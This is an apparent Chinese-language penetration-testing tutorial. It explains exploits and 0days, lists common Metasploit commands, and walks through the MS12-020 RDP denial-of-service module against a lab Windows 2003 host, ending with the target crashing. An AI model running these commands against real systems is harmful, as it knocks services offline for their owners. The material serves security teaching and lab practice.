漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。
每个操作系统都会存在各种Bug,想Windows这样有版权的操作系统,微软公司会很快的开发针对这些Bug的补丁供用户更新。全世界有大量的漏洞研究人员夜以继日的发现、研究新的Bug,这些没有公布补丁的Bug就是所谓的0day,0day对网络安全的威胁是巨大的。
metasploit常用漏洞利用命令:
search <name>
# 用指定关键字搜索可利用模块
use <exploit name>
# 使用漏洞
show options
# 显示可配置参数
set <OPTION NAME> <option>
# 设置选项
show payloads
# 显示可利用攻击载荷
下面以MS12-020漏洞来演示漏洞利用模块的使用。
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,MS12-020漏洞利用:
本机:kali 192.168.2.135
靶机:windows 2003 192.168.2.134
首先搜索可利用模块。
search ms12-020
这里选择:auxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
设置目标机参数,这里默认就是3389,所以不用修改:
set RHOST 192.168.2.134 set RPORT 3389
输入“run”或者“exploit”进行攻击。
这时候发现目标机已经蓝屏,直接被我们秒杀。。。
